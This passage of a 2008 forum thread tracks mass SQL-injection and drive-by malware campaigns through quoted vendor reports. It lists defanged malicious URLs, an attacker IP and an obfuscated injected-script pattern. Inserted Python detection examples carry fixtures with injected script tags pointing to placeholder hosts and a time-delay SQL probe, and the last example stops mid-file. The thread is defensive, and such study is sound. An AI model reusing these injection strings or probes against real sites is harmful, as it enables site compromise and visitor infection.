4. Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
5. Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer
Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically to China, Taiwan, Singapore, and Hong Kong. These vulnerabilities trigger JS_IFRAME.AD to redirect users to one of the following URLs:
* hxxp ://{BLOCKED}and.cn/real11.htm - detected as JS_REALPLAY.AT
* hxxp ://{BLOCKED}and.cn/real.htm - detected as JS_REALPLAY.CE
* hxxp ://{BLOCKED}and.cn/lz.htm - detected as JS_DLOADER.AP
* hxxp ://{BLOCKED}and.cn/bfyy.htm - detected as JS_DLOADER.GXS
* hxxp ://{BLOCKED}and.cn/14.htm - detected as JS_DLOADER.UOW
JS_IFRAME.AD was found to download the following:
* VBS_PSYME.CSZ
* JS_VEEMYFULL.AA
* JS_LIANZONG.E
* JS_SENGLOT.D
These four malware, in turn, download and execute
hxxp ://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
As of this writing, Google search results show some 327,000 pages that contain the malicious script tag..."

(Screenshots available at both TrendMicro URLs above.)

:ph34r:

#18 AplusWebMaster

Posted 23 May 2008 - 12:33 PM

Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

- http://isc.sans.org/...ml?storyid=4439
Last Updated: 2008-05-20 16:55:25 UTC ...(Version: 3) - "...Shadowserver has published a list of domains used in past -and- recent massive SQL injections* that insert malicious javascript into websites. The list is just focused on mass SQL injection attacks... plans to maintain this list as we come across new domains over time. The list also contains an estimate of the current number of infected Web sites based on Google stats. This is a great initiative and a very useful resource..."
* http://www.shadowser...lendar.20080514
Full list of Injected Sites ...last modified date/time at bottom of page

:!:

Edited by apluswebmaster, 23 May 2008 - 12:38 PM.


#19 AplusWebMaster

Posted 02 June 2008 - 05:21 AM

FYI...

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Page last modified on June 01, 2008, at 09:04 PM
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.
Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google)...
Some of these have been re-injected by URL encoding the script names. So if a host/domain shows up in parentheses and also in the list unencoded, these were two separate injection runs..."

("Full list..." at the URL above.)

:grrr: :ph34r:

#20 AplusWebMaster


Posted 02 June 2008 - 08:21 PM

FYI...

New sql injection site with fastflux hosting
- http://isc.sans.org/...ml?storyid=4519
Last Updated: 2008-06-02 22:13:22 UTC - "One of our frequent contributors notified us of a new sql injection site.
hxxp ://en-us18 .com /b.js is being injected via sql into websites.
When I googled for it I saw 560 injected webpages. b.js injects an iFrame which points to
hxxp ://en-us18 .com/cgi-bin/index.cgi?ad which in turn embeds two Flash files:

advert.swf: http://www.virustota...46f82c536abd0c7
banner.swf: http://www.virustota...272625634a3babc

This appears to be fast fluxed or at least setup to change rapidly based on this dig output... A second dig a few minutes later produced similar but slightly different results. So this domain is changing. I guess they got tired of people blackholing their ip address. So in that case I would recommend you dns blackhole that domain."

:ph34r:

#21 AplusWebMaster


Posted 06 June 2008 - 05:16 AM

And the list just keeps on growing...

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Page last modified on June 05, 2008, at 07:10 AM
Page last modified on June 06, 2008, at 06:22 AM

:(

Edited by apluswebmaster, 06 June 2008 - 01:01 PM.


#22 AplusWebMaster


Posted 12 June 2008 - 02:06 AM

Ongoing growth... ugh.

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Page last modified on June 11, 2008, at 11:16 AM


:(

#23 AplusWebMaster


Posted 13 June 2008 - 11:36 AM

FYI...

SQL Injection: More of the same
- http://isc.sans.org/...ml?storyid=4565
Last Updated: 2008-06-13 16:13:57 UTC - "...How to defend against this?
The "simple" answer is of course to just not have any SQL injection faults. But that's easier said than done, in particular for an existing legacy application. A couple of other things you can do:
* limit the database user the web application uses. Maybe it doesn't have to update anything, or only a few tables
* Monitor your web application for SQL errors. These statements may create some errors if your web application doesn't have sufficient privileges
* keep a close eye on your data and your application. Look for new javascript in titles and other spots that shouldn't have any..."

(More detail at the ISC URL above.)

:ph34r:

Edited by apluswebmaster, 13 June 2008 - 11:37 AM.


#24 AplusWebMaster


Posted 18 June 2008 - 05:37 AM

FYI...

- http://preview.tinyurl.com/64qke6
June 17, 2008 (trustedsource.org/blog) - "MTV France has become another victim of the “Latest Wave of SQL Injection Attacks“. The web site and the RSS feed are heavily infected with several malicious scripts as seen in the screenshot... Each of the malicious domains is serving a script called ‘b.js’ which is related to the “Danmec” malware family (a.k.a. “Asprox”). These domains are hosted on a “fast-flux” network of compromised computers which could also relay spam messages... The biggest concern with the infected RSS feed is that every RSS reader or web site, including the content from MTV France, will host the malicious scripts on their web sites. In a quick test with a WordPress 2.1.3 installation, the full content (including the script) was included in the blog and not filtered out. This is one example of the threat posed by Web 2.0 content mash-ups, where someone is including generated content via feeds into his web site and thereby just spreading the malicious code further."

(Screenshots available at the URL above.)

:shock:

#25 AplusWebMaster


Posted 25 June 2008 - 05:46 AM

FYI...

Microsoft SQL Injection Prevention Strategy
- http://www.spywarein...?...st&p=643245
2008-06-24

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
...last modified on June 25, 2008, at 05:17 AM

:!:

Edited by apluswebmaster, 25 June 2008 - 10:12 AM.


#26 AplusWebMaster


Posted 26 June 2008 - 05:46 PM

FYI...

- http://www.theregist...njection_tools/
26 June 2008 - "...ScanSafe, a company that monitors websites for malicious behavior, reports* a new wave of SQL-injection attacks that harnesses infected PCs to search out and attack vulnerable websites. Sites that are compromised, in turn, install backdoors on visitors' machines, creating a worm-like characteristic. The so-called Asprox attacks are distinct from a recent swarm of SQL attacks that over the past few months... The entry of Asprox suggests other malware gangs may be adopting the technique after seeing the success of their competitors..."
* http://preview.tinyurl.com/5cyo99
June 26, 2008 (ScanSafe STAT blog) - "The Asprox botnet began pumping out a fresh round of SQL injection attacks yesterday... The Asprox botnet causes infected computers (bots) to become the attack mechanism. Some of the bots are instructed to upload the SQL injection attack tool, which then queries search engines to find susceptible sites and attempts to exploit any found. Successful exploit results in compromised websites that silently attempt to infect visitors' computers. Other bots are used as hosts for the malware; these hosts appear to be using the Neosploit framework. Asprox uses fast flux, thus a single malware domain called by the compromised site may resolve to one of a number of IP addresses (i.e. one domain name may resolve to any one of a number of attacker-controlled victim computers commandeered to act as malware hosts)... a large number of the trafficked compromised sites appear to be from the manufacturing sector, particularly among companies involved in the manufacture or distribution of heating and cooling systems... the malware dropped in the June SQL injection attacks has shifted to backdoors and proxy Trojans - infections which add to the overall size of the Asprox botnet. The June attacks also appear to have some roots in the Ukraine and Malaysia, rather than China..."

:!: :ph34r:

#27 AplusWebMaster


Posted 01 July 2008 - 04:39 AM

FYI...

More SQL Injection with Fast Flux hosting
- http://isc.sans.org/...ml?storyid=4645
Last Updated: 2008-07-01 04:46:52 UTC ...(Version: 5) - "...More fast flux domains redirecting to other domains which then redirect to the malware site. What's interesting about this one is it doesn't look like they are using exploits to install the malware, they are redirecting to a fake AV site which fools users into installing the malware. Some of the domains hosting the injected js are as follows:
hxxp :// updatead .com
hxxp :// upgradead .com
hxxp :// clsiduser.com
hxxp :// dbdomaine.com
b.js then redirects to several domains which host a cgi script
hxxp :// kadport .com /cgi-bin/indes.cgi?ad
hxxp :// hdadwcd .com /cgi-bin/index.cgi?ad
Which then redirects to ad.js which redirects the user to
hxxp :// spyware-quick-scan .com?wmid=1041&I=14&it=1&s=4t
This site attempts to trick the user into installing installer.exe
AV coverage is decent:
http://www.virustota...945cbff173e67d8
...This post has a nice running list of domains: http://infosec20.blo...and-iframe.html
The cause seems to be the ASPROX bot kit, which got some SQL injection capabilities in mid-May, see http://www.heise-onl...l--/news/110742 .
Dr. Ullrich's post http://isc.sans.org/...ml?storyid=4565 lays out very nicely how it all happens... The folks at ShadowServer are keeping a comprehensive and updated list at:
http://www.shadowser...lendar.20080514
Page last modified on July 01, 2008, at 10:16 AM ..."

:grrr: :ph34r: :!:

Edited by apluswebmaster, 01 July 2008 - 03:24 PM.


#28 AplusWebMaster


Posted 03 July 2008 - 04:16 AM

FYI...

Detecting scripts in ASF files
- http://isc.sans.org/...ml?storyid=4664
Last Updated: 2008-07-03 08:11:02 UTC - "Back in April, I wrote a diary about an interesting ASF file that had a script stream included ( http://isc.sans.org/...ml?storyid=4355 ). The script stream caused Windows Media Player to use Internet Explorer to retrieve content from a URL embedded in the script. As you can probably already guess, the URL led to a web site serving some malware. Some other AV vendors picked this up as well. I asked if some of our readers knew of a utility that would allow us to extract script streams from ASF files. Initially I found that there is a utility from Microsoft, Windows Media File Editor, that allows one to list script commands. One of our readers, James Dean, did a great job and wrote a small utility that allows you to list embedded script commands from the command line, without using any GUI tools. This is great for batch analysis of multiple ASF files. You just need to create a directory, put all ASF files into it and run the tool with the directory name as a parameter... I compiled it for Windows. You can download the ZIP archive here*. MD5 of the ZIP archive is c9e5bba11051cfbc98dfa451442a71e8. With some modifications this can work on Linux as well – if you have time to modify the code let us know and we'll post the code for Linux as well since a lot of researchers use it..."
* http://handlers.sans...asfcommands.zip

:!:

#29 AplusWebMaster


Posted 03 July 2008 - 10:12 AM

FYI...

Sony PlayStation website hacked
- http://www.theregist...aystation_hack/
3 July 2008 - "Gamers visiting the US Sony PlayStation website risk malware infection after the site was hit by hackers. SQL injection vulnerabilities on the site were used by miscreants to load malicious code on pages showcasing the PlayStation games SingStar Pop and God of War, net security firm Sophos reports*. The code promotes scareware to visitors, which falsely claims that their computers are infected with computer viruses to frighten them into purchasing software of little or no security utility... Sophos informed Sony of the website vulnerabilities, which were purged by Thursday morning. The attack is the latest in a wave of SQL injection attacks that have turned the websites of legitimate organisations into conduits for drive-by download assaults. Recent victims have included the website of tennis regulators ITF and ATP, the professional players tour and Wal-Mart. Large-scale SQL Injection attacks starting around October 2007 have hit a large number of small sites as well as high-profile targets..."
* http://www.sophos.co...08/07/1540.html

:!:

#30 AplusWebMaster


Posted 04 July 2008 - 06:50 AM

Update... 7.4.2008

- http://atlas.arbor.n...ummary/fastflux
"...Currently monitoring -6508- fastflux domains..."


:shock:

#31 scorpiotiger


Posted 04 July 2008 - 02:39 PM

Do Hosts run virus checkers on their servers regularly? I would think they would... especially shared hosting servers.

??

#32 AplusWebMaster


Posted 04 July 2008 - 08:12 PM

Do Hosts run virus checkers on their servers regularly?...

Er, I think you may have missed the point of this thread.

These JavaScript injection/hacks made on the servers are -not- viruses, and wouldn't be caught by most AV's.

The *.js file is usually a -redirect- to a site that contains "drive-by malware", or exploits known vulnerabilities in browsers or other online applications, which is why it pays to stay "up-to-date".


:!:

Edited by apluswebmaster, 04 July 2008 - 08:14 PM.


#33 scorpiotiger


Posted 04 July 2008 - 08:36 PM

Do Hosts run virus checkers on their servers regularly?...

Er, I think you may have missed the point of this thread.

These JavaScript injection/hacks made on the servers are -not- viruses, and wouldn't be caught by most AV's.

The *.js file is usually a -redirect- to a site that contains "drive-by malware", or exploits known vulnerabilities in browsers or other online applications, which is why it pays to stay "up-to-date".


:!:


no.. I didn't miss the point.

and.. I went to show a friend of mine an infected page, and when he went to download it to his pc to look at it, his virus checker wouldn't let him do it.

and that makes sense, because these things are just "a javascript". they are javascripts with certain patterns and placed in certain spots.

example, recently, I cleaned up a site that was infected by a gpack exploit. I looked for those records modified within 5 minutes of the exploit I found, and looked on the last line for
<script>enum(unescape("
followed by a bunch of escaped characters which translated to a sequence where the 58.65.232.33 (ip of a hong kong site) was in the unescaped text. - followed by
")); </script>

this is pattern checking just like any other virus/spyware pattern checking. Granted.. the patterns aren't usually known until the fox gets into a lot of henhouses.. but once it is known, I would think there would be, if not a server virus checker, then some scripts written that would check a person's site and flag any similar patterns for inspection by the owner.

The site I cleaned up was small.. but that's what I probably would have ended up doing if the site had been bigger.

Edited by scorpiotiger, 05 July 2008 - 01:14 AM.
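The pattern check scorpiotiger describes above, together with the ISC advice in post #23 to look for new JavaScript in titles and other columns that should not carry any, as an added example that is not code from the thread or from any vendor named in it. It assumes the rows were already pulled out of the site's database as (table, column, key, value) tuples; the allowed-host list and the sample rows are constructed, and the hosts and IP address in them are placeholders, not real indicators.

```python
"""Scan stored page content for injected <script>/<iframe> references.

Added example (not the thread's or any vendor's code). It flags off-site
script and iframe references and inline <script>...unescape("...") blocks,
and it first strips URL/entity encoding, since re-injected rows were
stored encoded.
"""
import html
import re
from urllib.parse import unquote

# <script src=http://evil/b.js></script> or an <iframe src=...> pointing off-site.
EXTERNAL_REF_RE = re.compile(
    r'<(script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?\s*(?:https?:)?//([^/"\'\s>]+)',
    re.I,
)
# An inline <script> whose first statement decodes an escaped payload,
# e.g. <script>eval(unescape("%3C..."))</script>.
OBFUSCATED_RE = re.compile(r'<script\b[^>]*>[^<]{0,40}?\bunescape\s*\(', re.I)


def normalise(text, rounds=3):
    """Peel off (possibly nested) URL encoding and HTML entities; stop
    early when a round changes nothing."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_injections(text, allowed_hosts):
    """Return (kind, detail) tuples for every suspicious reference in text."""
    findings = []
    plain = normalise(text)
    for tag, host in EXTERNAL_REF_RE.findall(plain):
        host = host.lower()
        if host not in allowed_hosts:
            findings.append((f"external-{tag.lower()}", host))
    if OBFUSCATED_RE.search(plain):
        findings.append(("obfuscated-script", "unescape"))
    return findings


def scan_rows(rows, allowed_hosts):
    """rows: (table, column, key, value) tuples, e.g. the result of
    SELECT id, title FROM news. Non-string values are skipped."""
    flagged = []
    for table, column, key, value in rows:
        if not isinstance(value, str):
            continue
        hits = find_injections(value, allowed_hosts)
        if hits:
            flagged.append({"table": table, "column": column, "key": key, "hits": hits})
    return flagged


# Hosts the site legitimately loads scripts from (assumed).
ALLOWED_HOSTS = {"www.example.com"}

# Constructed sample rows; the hosts and the IP address are placeholders.
SAMPLE_ROWS = [
    ("news", "title", 1, 'Spring sale<script src=http://evil-example.invalid/b.js></script>'),
    ("news", "body", 2,
     "%3Cscript%20src%3D%22http%3A%2F%2Fevil-example.invalid%2Fngg.js%22%3E%3C%2Fscript%3E"),
    ("news", "body", 3,
     '<p>Hello</p><script>eval(unescape("%3Ciframe%20src%3Dhttp%3A%2F%2F198.51.100.7%2Fx.htm%3E"));</script>'),
    ("news", "body", 4, '<script src="https://www.example.com/site.js"></script><p>fine</p>'),
    ("news", "title", 5, "No markup at all"),
    ("news", "views", 6, 42),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS, ALLOWED_HOSTS):
        print(f"{f['table']}.{f['column']} id={f['key']}: {f['hits']}")
```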


#34 scorpiotiger


Posted 04 July 2008 - 08:44 PM

However, apluswebmaster, I do want to thank you for posting this information. The reason I'm here is because I was looking for ways to prevent this from happening again.

#35 AplusWebMaster


Posted 06 July 2008 - 08:29 AM

FYI...

- http://www.shadowser...lendar.20080705
5 July 2008 - "...People are saying they were compromised by SQL Injection, but when I dig a little deeper I find that what actually happened was some user went to somegoodsite.com and ended up compromised. If you're one of those people, this blog's for you...
Understanding the Danmec/Asprox Attacks...
Basically, the attacker launches an SQL injection attack against somegoodsite.com. SQL injection attacks try to exploit trust relationships between web applications and the databases that support them in order to add, remove or modify data in databases in ways it was never intended. In the case of the Danmec/Asprox attacks, the intent of the SQL injection is to add a single line of HTML code to the database so that somegoodsite.com will present it to every user who visits the site.
The initial code has been an HTML "script" command, which is used to define a segment of code for your browser to run. The difference in the Asprox/Danmec attacks though, is that the code segment to run is malicious javascript hosted at evilsite.net. This is called a drive-by download.
Innocent user wasn't targeted directly by the attacker's SQL injection. Instead, innocent user was harmlessly surfing the web during his 1 hour lunch break and got something more than he bargained for from somegoodsite.com. Evilsite.net then looks at the information presented by innocent user's system and determines that evilsite2.net is hosting an exploit that should be effective. Evilsite.net then issues an IFRAME redirect command telling innocent user's browser to contact evilsite2.net (all without any interaction from innocent user). Finally, evilsite2.net provides a working exploit which compromises innocent user's machine. These compromises can be in the form of keyloggers, botnets, backdoors, or any other nastiness an attacker can drum up. Since this exploit is reliant on innocent user's web client downloading and executing the malicious code on its own, we call this a client-side attack.
So the moral of the story is that somegoodsite.com got compromised by SQL injection. Your users got compromised by redirects, drive-by-downloads and client-side attacks."

(Graphic available at the Shadowserver URL above.)

:!:

#36 AplusWebMaster


Posted 17 July 2008 - 03:52 AM

FYI..

Governmental, Healthcare, and Top Business Websites have fallen victims to the new round of Asprox mass attack
- http://www.finjan.co...px?EntryId=2002
Jul 16, 2008 - "... The attack toolkit is designed to first search Google for webpages with the file extension [.asp] and then launch SQL injection attacks to append a reference to the malware file using the SCRIPT tag. During the first two weeks of July 2008, Finjan... detected over 1,000 unique Website domains that were compromised by this attack. Each of the compromised domains included a reference to malware that was served by over 160 different domains across the Internet. Since the list of these malware serving domains increases every day, we believe this is just the tip of the iceberg for the scope and impact of this attack. Among the compromised websites we found were those of respectable organizations, governmental institutes, healthcare organizations as well as high-ranked websites... Each of the 160 different domains hosting [b.js] and [ngg.js] [fgg.js] points to the location of the malicious file, which was unique to each and every one of them.
The pointed iframe loads obfuscated JavaScript code which then downloads and executes the malware on the victim machine automatically. The exploit is provided by writers of the new version of the NeoSploit toolkit, which uses a refreshing code for the obfuscation (using the location of the page as part of the obfuscation function)... The malicious code of the above script exploits several vulnerabilities on the victim’s machine in order to heighten the chances for successful exploitation:
* MDAC Vulnerability
* QuickTime rtsp Vulnerability
* AOL SuperBuddy ActiveX Control Code Execution Vulnerability
Upon successful exploitation, a Trojan is downloaded and executed on the victim’s machine..."

(Screenshots available at the URL above.)

Also see:
- http://www.shadowser...lendar.20080705

//

#37 AplusWebMaster


Posted 19 July 2008 - 05:23 AM

FYI...

- http://preview.tinyurl.com/6mgej5
July 16, 2008 - "...According to the latest ScanSafe Global Threat Report:
1. Malware Increases 278 Percent: Web-based malware increased 278 percent as more and more legitimate sites including Wal-Mart, Business Week, Ralph Lauren Home and Race for Life were compromised. This widespread compromise of legitimate websites was largely the result of automated attack tools which became freely available in the last months of 2007.
2. SQL Injection Attacks Outpace Other Attacks by 212 Percent: SQL injection attacks, an exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data, have rapidly become the most common form of website compromise, outpacing all other types of compromise by 212 percent. In June, SQL injection attacks accounted for 76 percent of all compromised sites.
3. Password Stealers and Backdoor Trojans Most Commonly Blocked Malware—Putting Corporate Data at Risk: Most of the compromises attempt to install password stealers and backdoor Trojans. This category of malware increased from 4 percent of malware in January to 27 percent in June.

The ScanSafe Global Threat Report is a study of the more than 60 billion Web requests it scanned and 600 million Web threats it blocked from January through June 2008 on behalf of corporate customers in more than 60 countries across five continents. It represents the world’s largest security analysis of real-world corporate Web traffic. A full copy of the report is available at http://www.scansafe....hreat_reports2/ ."

//

#38 AplusWebMaster


Posted 21 July 2008 - 10:04 AM

FYI...

SQL Injection List - Format Update
- http://www.shadowser...lendar.20080718
18 July 2008 - "Due to popular demand, the SQL Injection list maintained at http://www.shadowser...lendar.20080514 can be fetched in text form at http://www.shadowser...ql-inj-list.txt
Unfortunately this means the original web page will change somewhat, and I apologize for this. However, this will be better in the long run."

//

#39 AplusWebMaster


Posted 24 July 2008 - 05:15 AM

FYI...

- http://isc.sans.org/...ml?storyid=4771
Last Updated: 2008-07-24 07:47:29 UTC - "...it appears that the attackers expanded their target list of applications so they try to attack Cold Fusion applications now as well (previously they tried to attack ASP scripts only). If you are running Cold Fusion applications, this should be a wake-up call for you – make sure that you are not vulnerable to SQL injection. If I remember correctly, Cold Fusion does have some built-in protection against SQL injection attacks but there are clearly cases when that does not work (otherwise the attackers would not be attacking it)... It's actually a very common way that is used by hackers when they are exploiting blind SQL injection attacks. The idea is to create a condition that, if satisfied, will delay the execution of the script for a certain time period. So, the attacker watches the response time and if it was delayed, he knows that the SQL command was executed successfully. Here we're not talking about the blind SQL injection, but just a way to check if the script is vulnerable to SQL injection in general. So, the bot issues this command and checks the response time: if the reply came immediately (or in a couple of seconds, depending on the site/link speed) the site is not vulnerable. If the reply took 20 seconds then the site is vulnerable. This gives them an easy way to detect vulnerable sites and (probably) create a list of such sites that they might attack directly in the future. And the site owner will not notice anything (unless he/she is checking the logs)..."

//
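The log check the ISC entry above says most site owners never do, as an added example that is not ISC's or the thread's code: it flags the timing probe (a delay function in the query string plus an unusually slow reply) and, following the post #23 advice to monitor for SQL errors, requests with SQL metacharacters that ended in a server error. It assumes Apache "combined" logs with the request time in microseconds (LogFormat %D) appended as the last field; the sample lines are constructed, with TEST-NET addresses and fictitious paths.

```python
"""Flag web-server log entries that look like SQL injection probes.

Added example (not ISC's or the thread's code). Assumed log format:
Apache "combined" with the request duration in microseconds (%D)
appended as a final field.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$'
)
# Delay functions of the common engines: the probe waits, then times the reply.
DELAY_RE = re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.I)
# Characters and keywords that rarely belong in a legitimate query string.
SQL_META_RE = re.compile(r"'|--|;|/\*|\bunion\b|\bselect\b|\bdeclare\b|\bcast\s*\(", re.I)


def decode(path, rounds=3):
    """Undo (possibly nested) URL encoding so keywords become visible."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line, slow_seconds=10.0):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    request = decode(m["path"])
    seconds = int(m["usec"]) / 1_000_000
    reasons = []
    if DELAY_RE.search(request):
        reasons.append("delay-probe")
    if SQL_META_RE.search(request):
        # A slow reply to a request carrying SQL syntax is the timing signal;
        # a 5xx reply to one is the "SQL error" signal.
        if seconds >= slow_seconds:
            reasons.append("slow-with-sql-meta")
        if m["status"].startswith("5"):
            reasons.append("server-error-with-sql-meta")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "request": request,
            "seconds": round(seconds, 3), "status": m["status"], "reasons": reasons}


def scan_log(lines, slow_seconds=10.0):
    findings = (classify(line, slow_seconds) for line in lines)
    return [f for f in findings if f]


# Constructed sample lines (TEST-NET addresses, fictitious paths). The second
# line is a timing probe that took 20 s; the third is a quote that caused a 500;
# the last is a legitimately slow report page, which must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jul/2008:07:40:01 +0000] "GET /page.asp?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/4.0" 41000',
    '203.0.113.9 - - [24/Jul/2008:07:40:03 +0000] "GET /page.asp?id=12%3Bwaitfor%20delay%20%270:0:20%27-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0" 20043000',
    '203.0.113.9 - - [24/Jul/2008:07:41:10 +0000] "GET /catalog.cfm?cat=3%27 HTTP/1.1" 500 812 "-" "Mozilla/4.0" 50000',
    '203.0.113.5 - - [24/Jul/2008:07:42:00 +0000] "GET /report.asp?q=yearly HTTP/1.1" 200 9000 "-" "Mozilla/4.0" 21500000',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['request']} {f['seconds']}s status={f['status']} -> {', '.join(f['reasons'])}")
```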

#40 AplusWebMaster


Posted 08 August 2008 - 07:37 AM

FYI...

SQL Injection Attacks Targeting Chinese-oriented Sites
- http://www.f-secure....s/00001482.html
August 8, 2008 - "...in conjunction with the Beijing 2008 Olympics Games, and with ‘China’ being one of the more popular search engine keywords at the moment, it makes sense for malware writers to focus their attention on the Chinese web – and we’ve been seeing some interesting examples of SQL injection attacks specifically targeting websites designed for a Chinese audience, whether from the mainland or overseas. Like most SQL injection attacks, these attacks begin with a compromising script being injected into a legitimate site, compromising it and redirecting its users to a malicious website. This website then takes advantage of the vulnerabilities available on the user’s computer to download and execute malicious programs... a specially crafted Flash file exploiting Adobe Flash Player Integer overflow (CVE-2007-0071) is also served. When the webpage is loaded, it forcefully floods the user’s computer memory beyond its capacity, then takes advantage of the computer’s attempts to correct the problem to execute its own hidden code. If the user hasn’t updated their Flash Player* to newer versions than those targeted, their computer is vulnerable..."

* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version 9.0.124.0

//

#41 AplusWebMaster


Posted 08 August 2008 - 10:56 AM

FYI...

More SQL Injections ...active NOW
- http://isc.sans.org/...ml?storyid=4844
Last Updated: 2008-08-08 16:40:52 UTC - "... Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
Next:
A user visiting the site will hit w.js which, if they are using English, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html ... These files contain some JavaScript... So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. For the IE version, 9/36 at VT (Virustotal) detect the file as malicious, and for FF 10/36 detect the file as being malicious.
yahoo.htm
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute...
Office.htm
Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
ksx.htm
Attempts to get the browser to include the rondll32.exe file. Detection for rondll32.exe is good, with most AV products catching this one.
06014.htm
was unavailable at the time I checked.

These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops."

//

#42 AplusWebMaster


Posted 22 August 2008 - 07:09 PM

FYI...

Sunkist site - mass JavaScript injection
- http://securitylabs....lerts/3167.aspx
08.22.2008 - "Websense... has discovered that a Sunkist site is infected with a mass JavaScript injection that delivers a malicious payload. The reporting page on the Sunkist NewsLINK site contains malicious JavaScript code that loads malicious payloads from -nine- different hosts. Sunkist is a popular drink in the USA, Canada, UK, Australia, and other parts of the world..."

(Screenshot of the infected site available at the URL above.)

//

#43 AplusWebMaster


Posted 29 August 2008 - 06:06 AM

FYI...

- http://www.darkreadi...o...&print=true
AUGUST 27, 2008 - "...Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks... ScanSafe today reported* an 87 percent jump in malware blocked by its Web security service in July compared with June, 75 percent of which came from the wave of SQL injection attacks hitting Websites the past few months. ScanSafe detected 34 percent more malware last month than it did in all of 2007, according to the report..."
* http://www.scansafe....008_GTR_rev.pdf
"...ScanSafe reported a 278% increase for the first six months of the year. That alarming trend continued in July with the number of Web-based malware blocks increasing another 87% over the previous month. The majority of the increase in Web-based malware resulted from ongoing web-site compromises which represented 83% of all malware blocks for the month. 75% of all malware blocks were the result of SQL injection attacks, the majority of which were related to the Asprox fast flux botnet. The Asprox botnet is believed to have origins in Russia and has commercial interests ranging from spam and clickfraud to rogue anti-spyware software and backdoor Trojans. July 2008 also bore witness to an increase in social engineering email scams designed to install malware on victims' computers. 95% of ScanSafe customers fell for the scams and attempted to clickthrough to the malicious site, which represented 1.3% of all malware blocks for the month..."


#44 AplusWebMaster


Posted 16 September 2008 - 07:01 AM

FYI...

SQL injection ...BusinessWeek.com
- http://www.sophos.co...sinessweek.html
15 September 2008 - "Hundreds of webpages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected. According to Sophos, hackers used an SQL injection attack - where a vulnerability is exploited in order to insert malicious code into the site's underlying database - to pepper pages with code that tries to download malware from a Russian web server..."

(Video available at the URL above.)


#45 AplusWebMaster


Posted 18 September 2008 - 03:51 AM

FYI...

SQL threat: All Your (Data)base Are Belong to Trojan.Eskiuel...
- http://preview.tinyurl.com/45qhsy
09-17-2008 (Symantec Security Response Blog) - "...Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher... new SQL threat: Trojan.Eskiuel*. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existent passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host. The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server... Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights... Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally and remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures."
* http://www.symantec....-091215-0809-99

(Screenshots and more detail available at both URL links above.)

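
Added example (not code from the Symantec write-up or from this thread): the password guessing described in the post shows up on the SQL Server side as a burst of failed logins for 'sa' from one client. The script below walks ERRORLOG-style lines and flags any client that fails a configurable number of 'sa' logins inside a sliding window, and notes whether a successful 'sa' login from the same client followed (the case where a guess worked). The log lines are constructed to follow the ERRORLOG layout; the addresses, times and threshold are assumptions.

```python
"""Flag password guessing against the SQL Server 'sa' login in ERRORLOG lines.

Added example, not from the Symantec write-up or the forum post. The log lines
below are constructed to follow the SQL Server ERRORLOG layout
(timestamp, source, message); the IPs and times are invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failed 'sa' logins from one client, plus noise
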